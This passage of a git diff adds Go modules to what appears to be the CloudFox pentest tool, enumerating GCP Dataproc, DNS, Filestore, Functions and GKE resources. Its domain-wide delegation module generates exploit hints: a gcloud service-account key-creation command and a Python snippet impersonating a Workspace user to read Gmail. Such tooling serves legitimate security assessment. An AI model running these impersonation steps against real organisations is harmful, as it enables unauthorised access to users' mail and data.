info.ConfigBucket = cluster.Config.ConfigBucket + info.TempBucket = cluster.Config.TempBucket + + // Software config + if cluster.Config.SoftwareConfig != nil { + info.ImageVersion = cluster.Config.SoftwareConfig.ImageVersion + } + + // GCE cluster config + if cluster.Config.GceClusterConfig != nil { + gcc := cluster.Config.GceClusterConfig + info.ServiceAccount = gcc.ServiceAccount + info.Network = extractName(gcc.NetworkUri) + info.Subnetwork = extractName(gcc.SubnetworkUri) + info.InternalIPOnly = gcc.InternalIpOnly + info.Zone = extractName(gcc.ZoneUri) + + if gcc.ShieldedInstanceConfig != nil { + info.SecureBoot = gcc.ShieldedInstanceConfig.EnableSecureBoot + } + } + + // Master config + if cluster.Config.MasterConfig != nil { + mc := cluster.Config.MasterConfig + info.MasterMachineType = extractName(mc.MachineTypeUri) + info.MasterCount = mc.NumInstances + info.MasterInstanceNames = mc.InstanceNames + if mc.DiskConfig != nil { + info.MasterDiskSizeGB = mc.DiskConfig.BootDiskSizeGb + } + } + + // Worker config + if cluster.Config.WorkerConfig != nil { + wc := cluster.Config.WorkerConfig + info.WorkerMachineType = extractName(wc.MachineTypeUri) + info.WorkerCount = wc.NumInstances + if wc.DiskConfig != nil { + info.WorkerDiskSizeGB = wc.DiskConfig.BootDiskSizeGb + } + } + + // Security config + if cluster.Config.SecurityConfig != nil && cluster.Config.SecurityConfig.KerberosConfig != nil { + info.KerberosEnabled = true + } + } + + // Get IAM policy for the cluster + info.IAMBindings = s.getClusterIAMBindings(service, ctx, projectID, region, cluster.ClusterName) + + return info +} + +func (s *DataprocService) parseJob(job *dataproc.Job, projectID, region string) JobInfo { + info := JobInfo{ + JobID: job.Reference.JobId, + ProjectID: projectID, + Region: region, + ClusterName: job.Placement.ClusterName, + } + + if job.Status != nil { + info.Status = job.Status.State + info.StartTime = job.Status.StateStartTime + } + + if job.StatusHistory != nil && 
len(job.StatusHistory) > 0 { + for _, status := range job.StatusHistory { + if status.State == "DONE" || status.State == "ERROR" || status.State == "CANCELLED" { + info.EndTime = status.StateStartTime + break + } + } + } + + // Determine job type + if job.HadoopJob != nil { + info.JobType = "Hadoop" + } else if job.SparkJob != nil { + info.JobType = "Spark" + } else if job.PysparkJob != nil { + info.JobType = "PySpark" + } else if job.HiveJob != nil { + info.JobType = "Hive" + } else if job.PigJob != nil { + info.JobType = "Pig" + } else if job.SparkRJob != nil { + info.JobType = "SparkR" + } else if job.SparkSqlJob != nil { + info.JobType = "SparkSQL" + } else if job.PrestoJob != nil { + info.JobType = "Presto" + } else { + info.JobType = "Unknown" + } + + return info +} + +// getClusterIAMBindings retrieves IAM bindings for a Dataproc cluster +func (s *DataprocService) getClusterIAMBindings(service *dataproc.Service, ctx context.Context, projectID, region, clusterName string) []IAMBinding { + var bindings []IAMBinding + + resource := fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, region, clusterName) + policy, err := service.Projects.Regions.Clusters.GetIamPolicy(resource, &dataproc.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullPath string) string { + if fullPath == "" { + return "" + } + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go new file mode 100644 index 00000000..ae898fe2 --- /dev/null +++ b/gcp/services/dnsService/dnsService.go @@ -0,0 +1,208 @@ +package dnsservice + 
+import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dns "google.golang.org/api/dns/v1" +) + +type DNSService struct{} + +func New() *DNSService { + return &DNSService{} +} + +// ZoneInfo holds Cloud DNS managed zone details +type ZoneInfo struct { + Name string + ProjectID string + DNSName string // The DNS name (e.g., example.com.) + Description string + Visibility string // public or private + CreationTime string + + // DNSSEC configuration + DNSSECState string // on, off, transfer + DNSSECKeyType string + + // Private zone configuration + PrivateNetworks []string // VPC networks for private zones + + // Peering configuration + PeeringNetwork string + PeeringTargetProject string + + // Forwarding configuration + ForwardingTargets []string + + // Record count + RecordCount int64 + + // IAM bindings + IAMBindings []IAMBinding +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// RecordInfo holds DNS record details +type RecordInfo struct { + Name string + ProjectID string + ZoneName string + Type string // A, AAAA, CNAME, MX, TXT, etc. 
+ TTL int64 + RRDatas []string // Record data +} + +// Zones retrieves all DNS managed zones in a project +func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { + ctx := context.Background() + + service, err := dns.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var zones []ZoneInfo + + call := service.ManagedZones.List(projectID) + err = call.Pages(ctx, func(page *dns.ManagedZonesListResponse) error { + for _, zone := range page.ManagedZones { + info := parseZoneInfo(zone, projectID) + // Get IAM bindings for the zone + info.IAMBindings = ds.getZoneIAMBindings(service, ctx, projectID, zone.Name) + zones = append(zones, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return zones, nil +} + +// Records retrieves all DNS records in a zone +func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) { + ctx := context.Background() + + service, err := dns.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var records []RecordInfo + + call := service.ResourceRecordSets.List(projectID, zoneName) + err = call.Pages(ctx, func(page *dns.ResourceRecordSetsListResponse) error { + for _, rrset := range page.Rrsets { + info := RecordInfo{ + Name: rrset.Name, + ProjectID: projectID, + ZoneName: zoneName, + Type: rrset.Type, + TTL: rrset.Ttl, + RRDatas: rrset.Rrdatas, + } + records = append(records, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return records, nil +} + +// parseZoneInfo extracts relevant information from a DNS managed zone +func parseZoneInfo(zone *dns.ManagedZone, projectID string) ZoneInfo { + info := ZoneInfo{ + Name: zone.Name, + ProjectID: projectID, + DNSName: zone.DnsName, + Description: zone.Description, + Visibility: zone.Visibility, + CreationTime: 
// extractNetworkName returns the final path component of a compute network
// URL, e.g. ".../projects/PROJECT/global/networks/NETWORK" -> "NETWORK".
// Inputs containing no slash are returned unchanged.
func extractNetworkName(networkURL string) string {
	if idx := strings.LastIndex(networkURL, "/"); idx >= 0 {
		return networkURL[idx+1:]
	}
	return networkURL
}
&dns.GoogleIamV1GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go new file mode 100644 index 00000000..7d7b8662 --- /dev/null +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -0,0 +1,247 @@ +package domainwidedelegationservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iam "google.golang.org/api/iam/v1" +) + +type DomainWideDelegationService struct{} + +func New() *DomainWideDelegationService { + return &DomainWideDelegationService{} +} + +// DWDServiceAccount represents a service account with domain-wide delegation +type DWDServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + OAuth2ClientID string `json:"oauth2ClientId"` + DWDEnabled bool `json:"dwdEnabled"` + Keys []KeyInfo `json:"keys"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try +} + +// KeyInfo represents a service account key +type KeyInfo struct { + KeyID string `json:"keyId"` + CreatedAt string `json:"createdAt"` + ExpiresAt string `json:"expiresAt"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyType string `json:"keyType"` +} + +// Common Google Workspace OAuth scopes that DWD service accounts might have +var CommonWorkspaceScopes = 
[]string{ + "https://www.googleapis.com/auth/gmail.readonly", + "https://www.googleapis.com/auth/gmail.send", + "https://www.googleapis.com/auth/gmail.modify", + "https://www.googleapis.com/auth/drive", + "https://www.googleapis.com/auth/drive.readonly", + "https://www.googleapis.com/auth/calendar", + "https://www.googleapis.com/auth/calendar.readonly", + "https://www.googleapis.com/auth/admin.directory.user.readonly", + "https://www.googleapis.com/auth/admin.directory.group.readonly", + "https://www.googleapis.com/auth/spreadsheets", + "https://www.googleapis.com/auth/contacts.readonly", + "https://mail.google.com/", +} + +// GetDWDServiceAccounts finds service accounts that may have domain-wide delegation +func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([]DWDServiceAccount, error) { + ctx := context.Background() + service, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var dwdAccounts []DWDServiceAccount + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.ServiceAccounts.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + for _, sa := range resp.Accounts { + // Check if the service account has an OAuth2 client ID (required for DWD) + // The OAuth2ClientId field is populated when DWD is enabled + dwdEnabled := sa.Oauth2ClientId != "" + + account := DWDServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + OAuth2ClientID: sa.Oauth2ClientId, + DWDEnabled: dwdEnabled, + Description: sa.Description, + Keys: []KeyInfo{}, + RiskReasons: []string{}, + ExploitCommands: []string{}, + WorkspaceScopes: CommonWorkspaceScopes, + } + + // Check for keys + keysResp, err := service.Projects.ServiceAccounts.Keys.List( + fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, 
sa.Email), + ).Context(ctx).Do() + if err == nil { + // Collect user-managed keys (not system-managed) + for _, key := range keysResp.Keys { + if key.KeyType == "USER_MANAGED" { + // Extract key ID from full name (projects/.../keys/KEY_ID) + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + account.Keys = append(account.Keys, KeyInfo{ + KeyID: keyID, + CreatedAt: key.ValidAfterTime, + ExpiresAt: key.ValidBeforeTime, + KeyAlgorithm: key.KeyAlgorithm, + KeyType: key.KeyType, + }) + } + } + } + + // Analyze risk + account.RiskLevel, account.RiskReasons = s.analyzeRisk(account) + + // Generate exploit commands + account.ExploitCommands = s.generateExploitCommands(account) + + // Only include accounts with DWD or that look like they might be used for it + if dwdEnabled || s.looksLikeDWDAccount(account) { + dwdAccounts = append(dwdAccounts, account) + } + } + + return dwdAccounts, nil +} + +// looksLikeDWDAccount checks if a service account might be used for DWD based on naming +func (s *DomainWideDelegationService) looksLikeDWDAccount(account DWDServiceAccount) bool { + emailLower := strings.ToLower(account.Email) + descLower := strings.ToLower(account.Description) + nameLower := strings.ToLower(account.DisplayName) + + // Common naming patterns for DWD service accounts + dwdPatterns := []string{ + "delegation", "dwd", "workspace", "gsuite", "admin", + "gmail", "drive", "calendar", "directory", "impersonat", + } + + for _, pattern := range dwdPatterns { + if strings.Contains(emailLower, pattern) || + strings.Contains(descLower, pattern) || + strings.Contains(nameLower, pattern) { + return true + } + } + + return false +} + +func (s *DomainWideDelegationService) analyzeRisk(account DWDServiceAccount) (string, []string) { + var reasons []string + score := 0 + + if account.DWDEnabled { + reasons = append(reasons, "Domain-wide delegation ENABLED (OAuth2 Client ID present)") + score += 3 + } + + hasKeys := 
len(account.Keys) > 0 + if hasKeys { + reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", len(account.Keys))) + score += 2 + } + + if account.DWDEnabled && hasKeys { + reasons = append(reasons, "CRITICAL: DWD enabled + keys exist = can impersonate any Workspace user!") + score += 2 + } + + // Check for suspicious naming + if s.looksLikeDWDAccount(account) && !account.DWDEnabled { + reasons = append(reasons, "Name suggests DWD purpose but OAuth2 Client ID not detected") + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *DomainWideDelegationService) generateExploitCommands(account DWDServiceAccount) []string { + var commands []string + + if !account.DWDEnabled { + commands = append(commands, + "# DWD not confirmed - OAuth2 Client ID not present", + "# Check Google Admin Console: Security > API Controls > Domain-wide Delegation", + ) + return commands + } + + commands = append(commands, + fmt.Sprintf("# Domain-Wide Delegation Service Account: %s", account.Email), + fmt.Sprintf("# OAuth2 Client ID: %s", account.OAuth2ClientID), + "", + "# To exploit DWD, you need:", + "# 1. A key file for this service account", + "# 2. The email of a Workspace user to impersonate", + "# 3. 
Knowledge of which scopes are authorized in Admin Console", + "", + ) + + if len(account.Keys) > 0 { + commands = append(commands, + "# Create a new key (if you have iam.serviceAccountKeys.create permission):", + fmt.Sprintf("gcloud iam service-accounts keys create /tmp/key.json --iam-account=%s", account.Email), + "", + ) + } + + commands = append(commands, + "# Python exploit example:", + "# from google.oauth2 import service_account", + "# from googleapiclient.discovery import build", + "#", + "# creds = service_account.Credentials.from_service_account_file(", + "# 'key.json',", + fmt.Sprintf("# scopes=['https://www.googleapis.com/auth/gmail.readonly'],"), + "# subject='admin@yourdomain.com' # User to impersonate", + "# )", + "#", + "# gmail = build('gmail', 'v1', credentials=creds)", + "# messages = gmail.users().messages().list(userId='me').execute()", + "", + "# Common scopes to test (must be authorized in Admin Console):", + ) + + for _, scope := range CommonWorkspaceScopes[:5] { // First 5 most useful scopes + commands = append(commands, fmt.Sprintf("# - %s", scope)) + } + + return commands +} diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go new file mode 100644 index 00000000..837d259f --- /dev/null +++ b/gcp/services/filestoreService/filestoreService.go @@ -0,0 +1,96 @@ +package filestoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + file "google.golang.org/api/file/v1" +) + +type FilestoreService struct { + session *gcpinternal.SafeSession +} + +func New() *FilestoreService { + return &FilestoreService{} +} + +type FilestoreInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Tier string `json:"tier"` + State string `json:"state"` + Network string `json:"network"` + IPAddresses []string `json:"ipAddresses"` + Shares []ShareInfo `json:"shares"` + 
CreateTime string `json:"createTime"` +} + +type ShareInfo struct { + Name string `json:"name"` + CapacityGB int64 `json:"capacityGb"` +} + +func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { + ctx := context.Background() + service, err := file.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + + var instances []FilestoreInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *file.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := FilestoreInstanceInfo{ + Name: extractResourceName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + Tier: instance.Tier, + State: instance.State, + CreateTime: instance.CreateTime, + } + + if len(instance.Networks) > 0 { + info.Network = instance.Networks[0].Network + info.IPAddresses = instance.Networks[0].IpAddresses + } + + for _, share := range instance.FileShares { + info.Shares = append(info.Shares, ShareInfo{ + Name: share.Name, + CapacityGB: share.CapacityGb, + }) + } + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") + } + return instances, nil +} + +func extractResourceName(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +func extractLocation(name string) string { + parts := strings.Split(name, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go new file mode 100644 index 00000000..98329358 --- /dev/null +++ b/gcp/services/functionsService/functionsService.go @@ -0,0 +1,302 @@ +package 
functionsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" +) + +type FunctionsService struct{} + +func New() *FunctionsService { + return &FunctionsService{} +} + +// FunctionInfo holds Cloud Function details with security-relevant information +type FunctionInfo struct { + // Basic info + Name string + ProjectID string + Region string + State string + Description string + + // Runtime info + Runtime string + EntryPoint string + BuildID string + UpdateTime string + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // ALL_TRAFFIC, INTERNAL_ONLY, INTERNAL_AND_GCLB + VPCConnector string + VPCEgressSettings string // PRIVATE_RANGES_ONLY, ALL_TRAFFIC + AllTrafficOnLatest bool + + // Resource configuration (new enhancements) + AvailableMemoryMB int64 // Memory in MB + AvailableCPU string // CPU (e.g., "1", "2") + TimeoutSeconds int64 // Timeout in seconds + MaxInstanceCount int64 // Max concurrent instances + MinInstanceCount int64 // Min instances (cold start prevention) + MaxInstanceRequestConcurrency int64 // Max concurrent requests per instance + + // Trigger info + TriggerType string // HTTP, Pub/Sub, Cloud Storage, etc. 
+ TriggerURL string // For HTTP functions + TriggerEventType string + TriggerResource string + TriggerRetryPolicy string // RETRY_POLICY_RETRY, RETRY_POLICY_DO_NOT_RETRY + + // Environment variables (sanitized - just names, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // IAM (if retrieved) + IAMBindings []IAMBinding // All IAM bindings for this function + IsPublic bool // allUsers or allAuthenticatedUsers can invoke + + // Pentest-specific fields + EnvVarNames []string // Names of env vars (may hint at secrets) + SecretEnvVarNames []string // Names of secret env vars + SecretVolumeNames []string // Names of secret volumes + SourceLocation string // GCS or repo source location + SourceType string // GCS, Repository +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// Functions retrieves all Cloud Functions in a project across all regions +func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) { + ctx := context.Background() + + service, err := cloudfunctions.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + var functions []FunctionInfo + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Functions.List(parent) + err = call.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + info := parseFunctionInfo(fn, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := fs.getFunctionIAMPolicy(service, fn.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublic = parseIAMBindings(iamPolicy) + } + + functions = append(functions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + return functions, nil +} + +// 
parseFunctionInfo extracts relevant information from a Cloud Function +func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionInfo { + info := FunctionInfo{ + Name: extractFunctionName(fn.Name), + ProjectID: projectID, + State: fn.State, + } + + // Extract region from function name + // Format: projects/{project}/locations/{location}/functions/{name} + parts := strings.Split(fn.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Build configuration + if fn.BuildConfig != nil { + info.Runtime = fn.BuildConfig.Runtime + info.EntryPoint = fn.BuildConfig.EntryPoint + info.BuildID = fn.BuildConfig.Build + + // Extract source location (pentest-relevant) + if fn.BuildConfig.Source != nil { + if fn.BuildConfig.Source.StorageSource != nil { + info.SourceType = "GCS" + info.SourceLocation = fmt.Sprintf("gs://%s/%s", + fn.BuildConfig.Source.StorageSource.Bucket, + fn.BuildConfig.Source.StorageSource.Object) + } else if fn.BuildConfig.Source.RepoSource != nil { + info.SourceType = "Repository" + info.SourceLocation = fmt.Sprintf("%s/%s@%s", + fn.BuildConfig.Source.RepoSource.ProjectId, + fn.BuildConfig.Source.RepoSource.RepoName, + fn.BuildConfig.Source.RepoSource.BranchName) + } + } + } + + // Service configuration + if fn.ServiceConfig != nil { + info.ServiceAccount = fn.ServiceConfig.ServiceAccountEmail + info.IngressSettings = fn.ServiceConfig.IngressSettings + info.VPCConnector = fn.ServiceConfig.VpcConnector + info.VPCEgressSettings = fn.ServiceConfig.VpcConnectorEgressSettings + info.AllTrafficOnLatest = fn.ServiceConfig.AllTrafficOnLatestRevision + + // Resource configuration (new enhancements) + if fn.ServiceConfig.AvailableMemory != "" { + // Parse memory string (e.g., "256M", "1G") + memStr := fn.ServiceConfig.AvailableMemory + if strings.HasSuffix(memStr, "M") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } else if strings.HasSuffix(memStr, "G") { + if val, err := 
parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } + } + info.AvailableCPU = fn.ServiceConfig.AvailableCpu + info.TimeoutSeconds = fn.ServiceConfig.TimeoutSeconds + info.MaxInstanceCount = fn.ServiceConfig.MaxInstanceCount + info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount + info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency + + // Extract environment variable names (pentest-relevant - may hint at secrets) + if fn.ServiceConfig.EnvironmentVariables != nil { + info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) + for key := range fn.ServiceConfig.EnvironmentVariables { + info.EnvVarNames = append(info.EnvVarNames, key) + } + } + + // Extract secret environment variable names + if fn.ServiceConfig.SecretEnvironmentVariables != nil { + info.SecretEnvVarCount = len(fn.ServiceConfig.SecretEnvironmentVariables) + for _, secret := range fn.ServiceConfig.SecretEnvironmentVariables { + if secret != nil { + info.SecretEnvVarNames = append(info.SecretEnvVarNames, secret.Key) + } + } + } + + // Extract secret volume names + if fn.ServiceConfig.SecretVolumes != nil { + info.SecretVolumeCount = len(fn.ServiceConfig.SecretVolumes) + for _, vol := range fn.ServiceConfig.SecretVolumes { + if vol != nil { + info.SecretVolumeNames = append(info.SecretVolumeNames, vol.Secret) + } + } + } + + // Get HTTP trigger URL from service config + info.TriggerURL = fn.ServiceConfig.Uri + } + + // Event trigger configuration + if fn.EventTrigger != nil { + info.TriggerType = "Event" + info.TriggerEventType = fn.EventTrigger.EventType + info.TriggerResource = fn.EventTrigger.PubsubTopic + if info.TriggerResource == "" { + info.TriggerResource = fn.EventTrigger.Channel + } + } else if info.TriggerURL != "" { + info.TriggerType = "HTTP" + } + + info.Description = fn.Description + info.UpdateTime = fn.UpdateTime + + return info +} + +// getFunctionIAMPolicy retrieves the IAM policy for a function +func (fs *FunctionsService) 
getFunctionIAMPolicy(service *cloudfunctions.Service, functionName string) (*cloudfunctions.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Functions.GetIamPolicy(functionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings and checks for public access +func parseIAMBindings(policy *cloudfunctions.Policy) ([]IAMBinding, bool) { + var bindings []IAMBinding + isPublic := false + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on invoker roles + if (binding.Role == "roles/cloudfunctions.invoker" || + binding.Role == "roles/run.invoker") && + (member == "allUsers" || member == "allAuthenticatedUsers") { + isPublic = true + } + } + } + + return bindings, isPublic +} + +// extractFunctionName extracts just the function name from the full resource name +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// parseMemoryMB parses a memory string like "256M" or "1G" to MB +func parseMemoryMB(memStr string) (int64, error) { + memStr = strings.TrimSpace(memStr) + if len(memStr) == 0 { + return 0, fmt.Errorf("empty memory string") + } + + unit := memStr[len(memStr)-1] + valueStr := memStr[:len(memStr)-1] + + var value int64 + _, err := fmt.Sscanf(valueStr, "%d", &value) + if err != nil { + return 0, err + } + + switch unit { + case 'M', 'm': + return value, nil + case 'G', 'g': + return value * 1024, nil + case 'K', 'k': + return value / 1024, nil + default: + return 0, fmt.Errorf("unknown unit: %c", unit) + } +} diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go new file mode 100644 index 00000000..28a336f3 --- /dev/null +++ 
b/gcp/services/gkeService/gkeService.go @@ -0,0 +1,393 @@ +package gkeservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + container "google.golang.org/api/container/v1" +) + +type GKEService struct{} + +func New() *GKEService { + return &GKEService{} +} + +// ClusterInfo holds GKE cluster details with security-relevant information +type ClusterInfo struct { + // Basic info + Name string + ProjectID string + Location string // Zone or Region + Status string + Description string + + // Version info + CurrentMasterVersion string + CurrentNodeVersion string + ReleaseChannel string + + // Network configuration + Network string + Subnetwork string + ClusterIPv4CIDR string + ServicesIPv4CIDR string + Endpoint string // Master endpoint + PrivateCluster bool + MasterAuthorizedOnly bool + MasterAuthorizedCIDRs []string + + // Security configuration + NetworkPolicy bool + PodSecurityPolicy bool // Deprecated but may still be in use + BinaryAuthorization bool + ShieldedNodes bool + SecureBoot bool + IntegrityMonitoring bool + WorkloadIdentity string // Workload Identity Pool + NodeServiceAccount string + + // Authentication + LegacyABAC bool // Legacy ABAC authorization + IssueClientCertificate bool + BasicAuthEnabled bool // Deprecated + + // Logging and Monitoring + LoggingService string + MonitoringService string + + // Node pool info (aggregated) + NodePoolCount int + TotalNodeCount int + AutoscalingEnabled bool + + // GKE Autopilot + Autopilot bool + + // Node Auto-provisioning + NodeAutoProvisioning bool + + // Maintenance configuration + MaintenanceWindow string + MaintenanceExclusions []string + + // Addons + ConfigConnector bool + IstioEnabled bool // Anthos Service Mesh / Istio + + // Security issues detected + SecurityIssues []string +} + +// NodePoolInfo holds node pool details +type NodePoolInfo struct { + ClusterName string + Name string + ProjectID string + Location string + Status string + NodeCount 
int + MachineType string + DiskSizeGb int64 + DiskType string + ImageType string + ServiceAccount string + AutoRepair bool + AutoUpgrade bool + SecureBoot bool + IntegrityMonitoring bool + Preemptible bool + Spot bool + OAuthScopes []string + // Pentest-specific fields + HasCloudPlatformScope bool // Full access to GCP + RiskyScopes []string // Scopes that enable attacks +} + +// Clusters retrieves all GKE clusters in a project +func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { + ctx := context.Background() + + service, err := container.NewService(ctx) + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + // List clusters across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + var clusters []ClusterInfo + var nodePools []NodePoolInfo + + for _, cluster := range resp.Clusters { + info := parseClusterInfo(cluster, projectID) + clusters = append(clusters, info) + + // Parse node pools + for _, np := range cluster.NodePools { + npInfo := parseNodePoolInfo(np, cluster.Name, projectID, cluster.Location) + nodePools = append(nodePools, npInfo) + } + } + + return clusters, nodePools, nil +} + +// parseClusterInfo extracts security-relevant information from a GKE cluster +func parseClusterInfo(cluster *container.Cluster, projectID string) ClusterInfo { + info := ClusterInfo{ + Name: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + Status: cluster.Status, + Description: cluster.Description, + CurrentMasterVersion: cluster.CurrentMasterVersion, + CurrentNodeVersion: cluster.CurrentNodeVersion, + Endpoint: cluster.Endpoint, + Network: cluster.Network, + Subnetwork: cluster.Subnetwork, + ClusterIPv4CIDR: cluster.ClusterIpv4Cidr, + ServicesIPv4CIDR: 
cluster.ServicesIpv4Cidr, + LoggingService: cluster.LoggingService, + MonitoringService: cluster.MonitoringService, + SecurityIssues: []string{}, + } + + // Release channel + if cluster.ReleaseChannel != nil { + info.ReleaseChannel = cluster.ReleaseChannel.Channel + } + + // Private cluster configuration + if cluster.PrivateClusterConfig != nil { + info.PrivateCluster = cluster.PrivateClusterConfig.EnablePrivateNodes + if cluster.PrivateClusterConfig.EnablePrivateEndpoint { + info.Endpoint = cluster.PrivateClusterConfig.PrivateEndpoint + } + } + + // Master authorized networks + if cluster.MasterAuthorizedNetworksConfig != nil { + info.MasterAuthorizedOnly = cluster.MasterAuthorizedNetworksConfig.Enabled + for _, cidr := range cluster.MasterAuthorizedNetworksConfig.CidrBlocks { + info.MasterAuthorizedCIDRs = append(info.MasterAuthorizedCIDRs, cidr.CidrBlock) + } + } + + // Network policy + if cluster.NetworkPolicy != nil { + info.NetworkPolicy = cluster.NetworkPolicy.Enabled + } + + // Binary authorization + if cluster.BinaryAuthorization != nil { + info.BinaryAuthorization = cluster.BinaryAuthorization.Enabled + } + + // Shielded nodes + if cluster.ShieldedNodes != nil { + info.ShieldedNodes = cluster.ShieldedNodes.Enabled + } + + // Workload Identity + if cluster.WorkloadIdentityConfig != nil { + info.WorkloadIdentity = cluster.WorkloadIdentityConfig.WorkloadPool + } + + // Legacy ABAC (should be disabled) + if cluster.LegacyAbac != nil { + info.LegacyABAC = cluster.LegacyAbac.Enabled + } + + // Master auth (legacy) + if cluster.MasterAuth != nil { + info.IssueClientCertificate = cluster.MasterAuth.ClientCertificateConfig != nil && + cluster.MasterAuth.ClientCertificateConfig.IssueClientCertificate + // Check for basic auth (deprecated) + if cluster.MasterAuth.Username != "" { + info.BasicAuthEnabled = true + } 